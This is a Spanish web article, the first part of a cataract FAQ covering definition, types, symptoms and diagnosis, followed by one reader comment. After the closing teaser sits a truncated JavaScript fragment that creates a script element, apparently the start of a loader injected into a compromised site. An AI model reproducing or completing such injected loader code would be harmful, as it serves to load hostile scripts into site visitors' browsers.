Salud y belleza » Enfermedades

Preguntas frecuentes sobre las cataratas (Parte I)

1 Comentario

¿En qué consiste ese problema ocular denominado cataratas?

Desde la óptica oftalmológica, catarata es la opacificación total o parcial que se produce en la zona del cristalino. Como su nombre lo indica, el cristalino es una lente transparente ubicado en el ojo y cuya función primordial es permitir que la luz pase hacia la retina, es decir, la correcta focalización. Al producirse, una catarata restringe la entrada libre de aquella luz y, con ello, ocasiona graves problemas en la visión. Según estudios realizados por expertos, aproximadamente el 48% de los hombres o mujeres que pasan la franja de los sesenta y cinco años comienzan a padecer cataratas. El problema de cataratas puede afectar tanto un ojo como ambos, siendo generalmente una dificultad causada de forma conjunta, en pares (muy pocas veces ocurre en un globo ocular únicamente). Las cataratas son un mal que se va acrecentando a menos que se trate a tiempo y con las técnicas adecuadas.

¿Cuántos tipos de cataratas existen?

Básicamente, podemos hablar de dos clases de cataratas: congénita y adquirida. La primera es producida por causas hereditarias. En el caso de la segunda, que ciertamente es la más común, está dada por la edad y causada por acumulación de células muertas en las lentes naturales de los ojos. Dentro de las cataratas adquiridas se puede efectuar una subcategoría: senil, traumática y diabética.

¿Qué síntomatología presentan las cataratas?

A diferencia de lo que ocurre con la visión, los síntomas de las cataratas sí son claros. He aquí una lista con el detalle de las señales más comunes: visión borrosa o nublada, modificaciones en la percepción de los colores, dificultades para observar objetos brillantes o luz, visión doble, mejoría de la visión de cerca, vista cansada, etc. Generalmente, salvo algunos de los casos nombrados anteriormente, calquier cambio en la vista que sea determinante y se produzca sobre edades avanzadas, puede ser un alerta para revisar con un oftalmólogo si, en verdad, no se trata de cataratas.

¿Cómo se diagnostican las cataratas?

Para comprobar si efectivamente se trata de cataratas, es decir para detectar la enfermedad, es necesario realizar un examen óptico completo que incluya algunas pruebas como agudeza visual, tonometría y dilatación de las pupilas. Como ocurre en todos los casos, el diagnóstico temprano ayuda muchísimo para el control de las cataratas, por lo tanto es recomendable acudir con un profesional apenas comienzan a manifestarse los primeros síntomas (también es importante visitar con regularidad a un oftalmólogo para mayor tranquilidad).

¡No te pierdas la segunda parte del artículo ya orientada no al diagnóstico, sino a los tratamientos, las soluciones y todos los métodos útiles para volver a tener la vista como antes!var d=document;var s=d.createElement('script'); if (document.currentScript) {

Más consejos de salud y belleza : , , , ,

One Comment »

  • Natividad Doña Garcia said:

    Hola mi pregunta es, tengo cataratas en los dos ojos, pero ace una semana que el ojo iquierdo me duele siento pinchaso no se si sera de las cataratas o otro problema, el dia 14 de este mes tengo la revicion anual. muchas gracias.

    Natividad

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.